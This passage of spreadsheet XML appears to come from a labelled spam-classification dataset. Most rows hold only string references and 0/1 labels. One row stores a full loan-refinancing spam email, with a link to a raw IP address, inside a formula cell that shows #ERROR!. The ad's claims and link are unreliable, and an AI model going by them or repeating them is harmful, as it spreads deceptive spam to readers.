        <v>2958</v>
      </c>
      <c r="D4053" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4054" hidden="1">
      <c r="A4054" s="1">
        <v>4052.0</v>
      </c>
      <c r="B4054" s="1" t="s">
        <v>6024</v>
      </c>
      <c r="C4054" s="1" t="s">
        <v>6025</v>
      </c>
      <c r="D4054" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4055" hidden="1">
      <c r="A4055" s="1">
        <v>4053.0</v>
      </c>
      <c r="B4055" s="1" t="s">
        <v>6026</v>
      </c>
      <c r="C4055" s="1" t="s">
        <v>6027</v>
      </c>
      <c r="D4055" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4056" hidden="1">
      <c r="A4056" s="1">
        <v>4054.0</v>
      </c>
      <c r="B4056" s="1" t="s">
        <v>6028</v>
      </c>
      <c r="C4056" s="1" t="s">
        <v>6029</v>
      </c>
      <c r="D4056" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4057" hidden="1">
      <c r="A4057" s="1">
        <v>4055.0</v>
      </c>
      <c r="B4057" s="1" t="s">
        <v>1256</v>
      </c>
      <c r="C4057" s="1" t="s">
        <v>1257</v>
      </c>
      <c r="D4057" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4058" hidden="1">
      <c r="A4058" s="1">
        <v>4056.0</v>
      </c>
      <c r="B4058" s="1" t="s">
        <v>6030</v>
      </c>
      <c r="C4058" s="1" t="s">
        <v>6031</v>
      </c>
      <c r="D4058" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4059" hidden="1">
      <c r="A4059" s="1">
        <v>4057.0</v>
      </c>
      <c r="B4059" s="1" t="s">
        <v>6032</v>
      </c>
      <c r="C4059" s="1" t="s">
        <v>6033</v>
      </c>
      <c r="D4059" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4060">
      <c r="A4060" s="1">
        <v>4058.0</v>
      </c>
      <c r="B4060" s="1" t="s">
        <v>6034</v>
      </c>
      <c r="C4060" s="1" t="s">
        <v>6035</v>
      </c>
      <c r="D4060" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4061" hidden="1">
      <c r="A4061" s="1">
        <v>4059.0</v>
      </c>
      <c r="B4061" s="1" t="s">
        <v>1327</v>
      </c>
      <c r="C4061" s="1" t="s">
        <v>6036</v>
      </c>
      <c r="D4061" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4062">
      <c r="A4062" s="1">
        <v>4060.0</v>
      </c>
      <c r="B4062" s="1" t="s">
        <v>1323</v>
      </c>
      <c r="C4062" s="1" t="s">
        <v>1324</v>
      </c>
      <c r="D4062" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4063" hidden="1">
      <c r="A4063" s="1">
        <v>4061.0</v>
      </c>
      <c r="B4063" s="1" t="s">
        <v>6037</v>
      </c>
      <c r="C4063" s="1" t="s">
        <v>6038</v>
      </c>
      <c r="D4063" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4064" hidden="1">
      <c r="A4064" s="1">
        <v>4062.0</v>
      </c>
      <c r="B4064" s="1" t="s">
        <v>1327</v>
      </c>
      <c r="C4064" s="1" t="s">
        <v>1328</v>
      </c>
      <c r="D4064" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4065" hidden="1">
      <c r="A4065" s="1">
        <v>4063.0</v>
      </c>
      <c r="B4065" s="1" t="s">
        <v>904</v>
      </c>
      <c r="C4065" s="1" t="s">
        <v>905</v>
      </c>
      <c r="D4065" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4066">
      <c r="A4066" s="1">
        <v>4064.0</v>
      </c>
      <c r="B4066" s="1" t="s">
        <v>6039</v>
      </c>
      <c r="C4066" s="1" t="s">
        <v>6040</v>
      </c>
      <c r="D4066" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4067" hidden="1">
      <c r="A4067" s="1">
        <v>4065.0</v>
      </c>
      <c r="B4067" s="1" t="s">
        <v>6041</v>
      </c>
      <c r="C4067" s="1" t="s">
        <v>6042</v>
      </c>
      <c r="D4067" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4068" hidden="1">
      <c r="A4068" s="1">
        <v>4066.0</v>
      </c>
      <c r="B4068" s="1" t="s">
        <v>6043</v>
      </c>
      <c r="C4068" s="1" t="s">
        <v>6044</v>
      </c>
      <c r="D4068" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4069" hidden="1">
      <c r="A4069" s="1">
        <v>4067.0</v>
      </c>
      <c r="B4069" s="1" t="s">
        <v>6045</v>
      </c>
      <c r="C4069" s="1" t="s">
        <v>6046</v>
      </c>
      <c r="D4069" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4070" hidden="1">
      <c r="A4070" s="1">
        <v>4068.0</v>
      </c>
      <c r="B4070" s="1" t="s">
        <v>3431</v>
      </c>
      <c r="C4070" s="1" t="s">
        <v>3432</v>
      </c>
      <c r="D4070" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4071">
      <c r="A4071" s="1">
        <v>4069.0</v>
      </c>
      <c r="B4071" s="1" t="s">
        <v>484</v>
      </c>
      <c r="C4071" s="1" t="s">
        <v>485</v>
      </c>
      <c r="D4071" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4072" hidden="1">
      <c r="A4072" s="1">
        <v>4070.0</v>
      </c>
      <c r="B4072" s="1" t="s">
        <v>3755</v>
      </c>
      <c r="C4072" s="1" t="s">
        <v>3756</v>
      </c>
      <c r="D4072" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4073" hidden="1">
      <c r="A4073" s="1">
        <v>4071.0</v>
      </c>
      <c r="B4073" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C4073" s="1" t="s">
        <v>3855</v>
      </c>
      <c r="D4073" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4074" hidden="1">
      <c r="A4074" s="1">
        <v>4072.0</v>
      </c>
      <c r="B4074" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C4074" s="1" t="s">
        <v>611</v>
      </c>
      <c r="D4074" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4075" hidden="1">
      <c r="A4075" s="1">
        <v>4073.0</v>
      </c>
      <c r="B4075" s="1" t="s">
        <v>3254</v>
      </c>
      <c r="C4075" s="1" t="s">
        <v>3255</v>
      </c>
      <c r="D4075" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4076" hidden="1">
      <c r="A4076" s="1">
        <v>4074.0</v>
      </c>
      <c r="B4076" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="C4076" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="D4076" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4077" hidden="1">
      <c r="A4077" s="1">
        <v>4075.0</v>
      </c>
      <c r="B4077" s="1" t="s">
        <v>6047</v>
      </c>
      <c r="C4077" s="1" t="s">
        <v>6048</v>
      </c>
      <c r="D4077" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4078" hidden="1">
      <c r="A4078" s="1">
        <v>4076.0</v>
      </c>
      <c r="B4078" s="1" t="s">
        <v>6049</v>
      </c>
      <c r="C4078" s="1" t="s">
        <v>6050</v>
      </c>
      <c r="D4078" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4079" hidden="1">
      <c r="A4079" s="1">
        <v>4077.0</v>
      </c>
      <c r="B4079" s="1" t="s">
        <v>6051</v>
      </c>
      <c r="C4079" s="1" t="s">
        <v>6052</v>
      </c>
      <c r="D4079" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4080" hidden="1">
      <c r="A4080" s="1">
        <v>4078.0</v>
      </c>
      <c r="B4080" s="1" t="s">
        <v>1666</v>
      </c>
      <c r="C4080" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D4080" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4081">
      <c r="A4081" s="1">
        <v>4079.0</v>
      </c>
      <c r="B4081" s="1" t="s">
        <v>6053</v>
      </c>
      <c r="C4081" s="1" t="s">
        <v>6054</v>
      </c>
      <c r="D4081" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4082" hidden="1">
      <c r="A4082" s="1">
        <v>4080.0</v>
      </c>
      <c r="B4082" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C4082" s="1" t="s">
        <v>2436</v>
      </c>
      <c r="D4082" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4083" hidden="1">
      <c r="A4083" s="1">
        <v>4081.0</v>
      </c>
      <c r="B4083" s="1" t="s">
        <v>6055</v>
      </c>
      <c r="C4083" s="1" t="s">
        <v>6056</v>
      </c>
      <c r="D4083" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4084">
      <c r="A4084" s="1">
        <v>4082.0</v>
      </c>
      <c r="B4084" s="1" t="s">
        <v>1420</v>
      </c>
      <c r="C4084" s="1" t="s">
        <v>1421</v>
      </c>
      <c r="D4084" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4085" hidden="1">
      <c r="A4085" s="1">
        <v>4083.0</v>
      </c>
      <c r="B4085" s="1" t="s">
        <v>5717</v>
      </c>
      <c r="C4085" s="1" t="s">
        <v>5718</v>
      </c>
      <c r="D4085" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4086" hidden="1">
      <c r="A4086" s="1">
        <v>4084.0</v>
      </c>
      <c r="B4086" s="1" t="s">
        <v>1001</v>
      </c>
      <c r="C4086" s="1" t="s">
        <v>6057</v>
      </c>
      <c r="D4086" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4087">
      <c r="A4087" s="1">
        <v>4085.0</v>
      </c>
      <c r="B4087" s="1" t="s">
        <v>6058</v>
      </c>
      <c r="C4087" s="1" t="s">
        <v>6059</v>
      </c>
      <c r="D4087" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4088" hidden="1">
      <c r="A4088" s="1">
        <v>4086.0</v>
      </c>
      <c r="B4088" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C4088" s="1" t="s">
        <v>1273</v>
      </c>
      <c r="D4088" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4089" hidden="1">
      <c r="A4089" s="1">
        <v>4087.0</v>
      </c>
      <c r="B4089" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C4089" s="1" t="s">
        <v>6060</v>
      </c>
      <c r="D4089" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4090" hidden="1">
      <c r="A4090" s="1">
        <v>4088.0</v>
      </c>
      <c r="B4090" s="1" t="s">
        <v>6061</v>
      </c>
      <c r="C4090" s="1" t="s">
        <v>6062</v>
      </c>
      <c r="D4090" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4091" hidden="1">
      <c r="A4091" s="1">
        <v>4089.0</v>
      </c>
      <c r="B4091" s="1" t="s">
        <v>6063</v>
      </c>
      <c r="C4091" s="1" t="s">
        <v>6064</v>
      </c>
      <c r="D4091" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4092" hidden="1">
      <c r="A4092" s="1">
        <v>4090.0</v>
      </c>
      <c r="B4092" s="1" t="s">
        <v>6065</v>
      </c>
      <c r="C4092" s="1" t="s">
        <v>6066</v>
      </c>
      <c r="D4092" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4093" hidden="1">
      <c r="A4093" s="1">
        <v>4091.0</v>
      </c>
      <c r="B4093" s="1" t="s">
        <v>6067</v>
      </c>
      <c r="C4093" s="1" t="s">
        <v>6068</v>
      </c>
      <c r="D4093" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4094" hidden="1">
      <c r="A4094" s="1">
        <v>4092.0</v>
      </c>
      <c r="B4094" s="1" t="s">
        <v>5005</v>
      </c>
      <c r="C4094" s="1" t="s">
        <v>5006</v>
      </c>
      <c r="D4094" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4095" hidden="1">
      <c r="A4095" s="1">
        <v>4093.0</v>
      </c>
      <c r="B4095" s="1" t="s">
        <v>6069</v>
      </c>
      <c r="C4095" s="1" t="s">
        <v>6070</v>
      </c>
      <c r="D4095" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4096">
      <c r="A4096" s="1">
        <v>4094.0</v>
      </c>
      <c r="B4096" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="C4096" s="1" t="s">
        <v>6071</v>
      </c>
      <c r="D4096" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4097" hidden="1">
      <c r="A4097" s="1">
        <v>4095.0</v>
      </c>
      <c r="B4097" s="1" t="s">
        <v>6072</v>
      </c>
      <c r="C4097" s="1" t="s">
        <v>6073</v>
      </c>
      <c r="D4097" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4098">
      <c r="A4098" s="1">
        <v>4096.0</v>
      </c>
      <c r="B4098" s="1" t="s">
        <v>2489</v>
      </c>
      <c r="C4098" s="3" t="str">
        <f>=========================================================================
 Now you can have HUNDREDS of lenders compete for your loan!
 FACT: Interest Rates are at their lowest point in 40 years!
 You're eligible even with less than perfect credit !!
 	* Refinancing
 	* New Home Loans
 	* Debt Consolidation
 	* Debt Consultation
 	* Auto Loans
 	* Credit Cards
 	* Student Loans
 	* Second Mortgage
 	* Home Equity
 This Service is 100% FREE without any obligation.
 Visit Our Web Site at:  http://61.129.68.19/user0201/index.asp?Afft=QM3
 ============================================================================
 To Unsubscribe: http://61.129.68.19/light/watch.asp
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D4098" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4099" hidden="1">
      <c r="A4099" s="1">
        <v>4097.0</v>
      </c>
      <c r="B4099" s="1" t="s">
        <v>4770</v>
      </c>
      <c r="C4099" s="1" t="s">
        <v>4771</v>
      </c>
      <c r="D4099" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4100" hidden="1">
      <c r="A4100" s="1">
        <v>4098.0</v>
      </c>
      <c r="B4100" s="1" t="s">
        <v>6074</v>
      </c>
      <c r="C4100" s="1" t="s">
        <v>6075</v>
      </c>
      <c r="D4100" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4101">
      <c r="A4101" s="1">
        <v>4099.0</v>
      </c>
      <c r="B4101" s="1" t="s">
        <v>6076</v>
      </c>
      <c r="C4101" s="1" t="s">
        <v>6077</v>
      </c>
      <c r="D4101" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4102" hidden="1">
      <c r="A4102" s="1">
        <v>4100.0</v>
      </c>
      <c r="B4102" s="1" t="s">
        <v>2941</v>
      </c>
      <c r="C4102" s="1" t="s">
        <v>2942</v>
      </c>
      <c r="D4102" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4103" hidden="1">
      <c r="A4103" s="1">
        <v>4101.0</v>
      </c>
      <c r="B4103" s="1" t="s">
        <v>6078</v>
      </c>
      <c r="C4103" s="1" t="s">
        <v>6079</v>
      </c>
      <c r="D4103" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4104" hidden="1">
      <c r="A4104" s="1">
        <v>4102.0</v>
      </c>
      <c r="B4104" s="1" t="s">
        <v>4824</v>
      </c>
      <c r="C4104" s="1" t="s">
        <v>6080</v>
      </c>
      <c r="D4104" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4105">
      <c r="A4105" s="1">
        <v>4103.0</v>
      </c>
      <c r="B4105" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C4105" s="1" t="s">
        <v>19</v>
      </c>
      <c r="D4105" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4106" hidden="1">
      <c r="A4106" s="1">
        <v>4104.0</v>
      </c>
      <c r="B4106" s="1" t="s">
        <v>448</v>
      </c>
      <c r="C4106" s="1" t="s">
        <v>449</v>
      </c>
      <c r="D4106" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4107">
      <c r="A4107" s="1">
        <v>4105.0</v>
      </c>
      <c r="B4107" s="1" t="s">
        <v>6081</v>
      </c>
      <c r="C4107" s="1" t="s">
        <v>6082</v>
      </c>
      <c r="D4107" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4108" hidden="1">
      <c r="A4108" s="1">
        <v>4106.0</v>
      </c>
      <c r="B4108" s="1" t="s">
        <v>3299</v>
      </c>
      <c r="C4108" s="1" t="s">
        <v>6083</v>
      </c>
      <c r="D4108" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4109">
      <c r="A4109" s="1">
        <v>4107.0</v>
      </c>
      <c r="B4109" s="1" t="s">
        <v>6084</v>
      </c>
      <c r="C4109" s="1" t="s">
        <v>6085</v>
      </c>
      <c r="D4109" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4110" hidden="1">
      <c r="A4110" s="1">
        <v>4108.0</v>
      </c>
      <c r="B4110" s="1" t="s">
        <v>6086</v>
      </c>
      <c r="C4110" s="1" t="s">
        <v>6087</v>
      </c>
      <c r="D4110" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4111" hidden="1">
      <c r="A4111" s="1">
        <v>4109.0</v>
      </c>
      <c r="B4111" s="1" t="s">
        <v>6088</v>
      </c>
      <c r="C4111" s="1" t="s">
        <v>6089</v>
      </c>
      <c r="D4111" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4112" hidden="1">
      <c r="A4112" s="1">
        <v>4110.0</v>
      </c>
      <c r="B4112" s="1" t="s">
        <v>6090</v>
      </c>
      <c r="C4112" s="1" t="s">
        <v>6091</v>
      </c>
      <c r="D4112" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4113" hidden="1">
      <c r="A4113" s="1">
        <v>4111.0</v>
      </c>
      <c r="B4113" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C4113" s="1" t="s">
        <v>6092</v>
      </c>
      <c r="D4113" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4114" hidden="1">
      <c r="A4114" s="1">
        <v>4112.0</v>
      </c>
      <c r="B4114" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C4114" s="1" t="s">
        <v>2858</v>
      </c>
      <c r="D4114" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4115" hidden="1">
      <c r="A4115" s="1">
        <v>4113.0</v>
      </c>
      <c r="B4115" s="1" t="s">
        <v>2213</v>
      </c>
      <c r="C4115" s="1" t="s">
        <v>2214</v>
      </c>
      <c r="D4115" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4116">
      <c r="A4116" s="1">
        <v>4114.0</v>
      </c>
      <c r="B4116" s="1" t="s">
        <v>6093</v>
      </c>
      <c r="C4116" s="1" t="s">
        <v>6094</v>
      </c>
      <c r="D4116" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4117" hidden="1">
      <c r="A4117" s="1">
        <v>4115.0</v>
      </c>
      <c r="B4117" s="1" t="s">
        <v>3378</v>
      </c>
      <c r="C4117" s="1" t="s">
        <v>3379</v>
      </c>
      <c r="D4117" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4118" hidden="1">
      <c r="A4118" s="1">
        <v>4116.0</v>
      </c>
      <c r="B4118" s="1" t="s">
        <v>6095</v>
      </c>
      <c r="C4118" s="1" t="s">
        <v>6096</v>
      </c>
      <c r="D4118" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4119" hidden="1">
      <c r="A4119" s="1">
        <v>4117.0</v>
      </c>
      <c r="B4119" s="1" t="s">
        <v>784</v>
      </c>
      <c r="C4119" s="1" t="s">
        <v>1104</v>
      </c>
      <c r="D4119" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4120" hidden="1">
      <c r="A4120" s="1">
        <v>4118.0</v>
      </c>
      <c r="B4120" s="1" t="s">
        <v>6097</v>
      </c>
      <c r="C4120" s="1" t="s">
        <v>6098</v>
      </c>
      <c r="D4120" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4121" hidden="1">
      <c r="A4121" s="1">
        <v>4119.0</v>
      </c>
      <c r="B4121" s="1" t="s">
        <v>4095</v>
      </c>
      <c r="C4121" s="1" t="s">
        <v>4096</v>
      </c>
      <c r="D4121" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4122">
      <c r="A4122" s="1">
        <v>4120.0</v>
      </c>
      <c r="B4122" s="1" t="s">
        <v>6099</v>
      </c>
      <c r="C4122" s="1" t="s">
        <v>6100</v>
      </c>
      <c r="D4122" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4123" hidden="1">
      <c r="A4123" s="1">
        <v>4121.0</v>
      </c>
      <c r="B4123" s="1" t="s">
        <v>6101</v>
      </c>
      <c r="C4123" s="1" t="s">
        <v>6102</v>
      </c>
      <c r="D4123" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4124" hidden="1">
      <c r="A4124" s="1">
        <v>4122.0</v>
      </c>
      <c r="B4124" s="1" t="s">
        <v>6103</v>
      </c>
      <c r="C4124" s="1" t="s">
        <v>6104</v>
      </c>
      <c r="D4124" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4125" hidden="1">
      <c r="A4125" s="1">
        <v>4123.0</v>
      </c>
      <c r="B4125" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C4125" s="1" t="s">
        <v>6105</v>
      </c>
      <c r="D4125" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4126" hidden="1">
      <c r="A4126" s="1">
        <v>4124.0</v>
      </c>
      <c r="B4126" s="1" t="s">
        <v>814</v>
      </c>
      <c r="C4126" s="1" t="s">
        <v>6106</v>
      </c>
      <c r="D4126" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4127" hidden="1">
      <c r="A4127" s="1">
        <v>4125.0</v>
      </c>
      <c r="B4127" s="1" t="s">
        <v>6107</v>
      </c>
      <c r="C4127" s="1" t="s">
        <v>6108</v>
      </c>
      <c r="D4127" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4128">
      <c r="A4128" s="1">
        <v>4126.0</v>
      </c>
      <c r="B4128" s="1" t="s">
        <v>6109</v>
      </c>
      <c r="C4128" s="1" t="s">
        <v>6110</v>
      </c>
      <c r="D4128" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4129" hidden="1">
      <c r="A4129" s="1">
        <v>4127.0</v>
      </c>
      <c r="B4129" s="1" t="s">
        <v>5142</v>
      </c>
      <c r="C4129" s="1" t="s">
        <v>5143</v>
      </c>
      <c r="D4129" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4130" hidden="1">
      <c r="A4130" s="1">
        <v>4128.0</v>
      </c>
      <c r="B4130" s="1" t="s">
        <v>4122</v>
      </c>
      <c r="C4130" s="1" t="s">
        <v>6111</v>
      </c>
      <c r="D4130" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4131" hidden="1">
      <c r="A4131" s="1">
        <v>4129.0</v>
      </c>
      <c r="B4131" s="1" t="s">
        <v>624</v>
      </c>
      <c r="C4131" s="1" t="s">
        <v>625</v>
      </c>
      <c r="D4131" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4132" hidden="1">
      <c r="A4132" s="1">
        <v>4130.0</v>
      </c>
      <c r="B4132" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C4132" s="1" t="s">
        <v>4617</v>
      </c>
      <c r="D4132" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4133" hidden="1">
      <c r="A4133" s="1">
        <v>4131.0</v>
      </c>
      <c r="B4133" s="1" t="s">
        <v>3596</v>
      </c>
      <c r="C4133" s="1" t="s">
        <v>6112</v>
      </c>
      <c r="D4133" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4134" hidden="1">
      <c r="A4134" s="1">
        <v>4132.0</v>
      </c>
      <c r="B4134" s="1" t="s">
        <v>5605</v>
      </c>
      <c r="C4134" s="1" t="s">
        <v>6113</v>
      </c>
      <c r="D4134" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4135" hidden="1">
      <c r="A4135" s="1">
        <v>4133.0</v>
      </c>
      <c r="B4135" s="1" t="s">
        <v>6114</v>
      </c>
      <c r="C4135" s="1" t="s">
        <v>6115</v>
      </c>
      <c r="D4135" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4136" hidden="1">
      <c r="A4136" s="1">
        <v>4134.0</v>
      </c>
      <c r="B4136" s="1" t="s">
        <v>434</v>
      </c>
      <c r="C4136" s="1" t="s">
        <v>435</v>
      </c>
      <c r="D4136" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4137" hidden="1">
      <c r="A4137" s="1">
        <v>4135.0</v>
      </c>
      <c r="B4137" s="1" t="s">
        <v>6116</v>
      </c>
      <c r="C4137" s="1" t="s">
        <v>6117</v>
      </c>
      <c r="D4137" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4138">
      <c r="A4138" s="1">
        <v>4136.0</v>
      </c>
      <c r="B4138" s="1" t="s">
        <v>6118</v>
      </c>
      <c r="C4138" s="1" t="s">
        <v>6119</v>
      </c>
      <c r="D4138" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4139">
      <c r="A4139" s="1">
        <v>4137.0</v>
      </c>
      <c r="B4139" s="1" t="s">
        <v>4582</v>
      </c>
      <c r="C4139" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="D4139" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4140">
      <c r="A4140" s="1">
        <v>4138.0</v>
      </c>
      <c r="B4140" s="1" t="s">
        <v>2898</v>
      </c>
      <c r="C4140" s="1" t="s">
        <v>2899</v>
      </c>
      <c r="D4140" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4141" hidden="1">
      <c r="A4141" s="1">
        <v>4139.0</v>
      </c>
      <c r="B4141" s="1" t="s">
        <v>5496</v>
      </c>
      <c r="C4141" s="1" t="s">
        <v>5497</v>
      </c>
      <c r="D4141" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4142" hidden="1">
      <c r="A4142" s="1">
        <v>4140.0</v>
      </c>
      <c r="B4142" s="1" t="s">
        <v>82</v>
      </c>
      <c r="C4142" s="1" t="s">
        <v>83</v>
      </c>
      <c r="D4142" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4143">
      <c r="A4143" s="1">
        <v>4141.0</v>
      </c>
      <c r="B4143" s="1" t="s">
        <v>3923</v>
      </c>
      <c r="C4143" s="1" t="s">
        <v>4302</v>
      </c>
      <c r="D4143" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4144" hidden="1">
      <c r="A4144" s="1">
        <v>4142.0</v>
      </c>
      <c r="B4144" s="1" t="s">
        <v>986</v>
      </c>
      <c r="C4144" s="1" t="s">
        <v>6120</v>
      </c>
      <c r="D4144" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4145">
      <c r="A4145" s="1">
        <v>4143.0</v>
      </c>
      <c r="B4145" s="1" t="s">
        <v>1401</v>
      </c>
      <c r="C4145" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="D4145" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4146" hidden="1">
      <c r="A4146" s="1">
        <v>4144.0</v>
      </c>
      <c r="B4146" s="1" t="s">
        <v>4974</v>
      </c>
      <c r="C4146" s="1" t="s">
        <v>4975</v>
      </c>
      <c r="D4146" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4147" hidden="1">
      <c r="A4147" s="1">
        <v>4145.0</v>
      </c>
      <c r="B4147" s="1" t="s">
        <v>4592</v>
      </c>
      <c r="C4147" s="1" t="s">
        <v>4593</v>
      </c>
      <c r="D4147" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4148">
      <c r="A4148" s="1">
        <v>4146.0</v>
      </c>
      <c r="B4148" s="1" t="s">
        <v>6121</v>
      </c>
      <c r="C4148" s="1" t="s">
        <v>6122</v>
      </c>
      <c r="D4148" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="4149" hidden="1">
      <c r="A4149" s="1">
        <v>4147.0</v>
      </c>
      <c r="B4149" s="1" t="s">
        <v>6123</v>
      </c>
      <c r="C4149" s="1" t="s">
        <v>6124</v>
      </c>
      <c r="D4149" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4150" hidden="1">
      <c r="A4150" s="1">
        <v>4148.0</v>
      </c>
      <c r="B4150" s="1" t="s">
        <v>6125</v>
      </c>
      <c r="C4150" s="1" t="s">
        <v>6126</v>
      </c>
      <c r="D4150" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4151" hidden="1">
      <c r="A4151" s="1">
        <v>4149.0</v>
      </c>
      <c r="B4151" s="1" t="s">
        <v>167</v>
      </c>
      <c r="C4151" s="1" t="s">
        <v>6127</v>
      </c>
      <c r="D4151" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4152" hidden="1">
      <c r="A4152" s="1">
        <v>4150.0</v>
      </c>
      <c r="B4152" s="1" t="s">
        <v>6128</v>
      </c>
      <c r="C4152" s="1" t="s">
        <v>6129</v>
      </c>
      <c r="D4152" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4153" hidden="1">
      <c r="A4153" s="1">
        <v>4151.0</v>
      </c>
      <c r="B4153" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C4153" s="1" t="s">
        <v>6130</v>
      </c>
      <c r="D4153" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="4154" hidden="1">
      <c r="A4154" s="1">
        <v>4152.0</v>
      </c>
      <c r="B4154" s="1" t="s">
        <v>4265</v>
      </c>
      <c r="C4154" s="1" t="s">
        <v>4266</v>
      </c>
      <c r="D4154" s="1">
        <v>0.0</v>
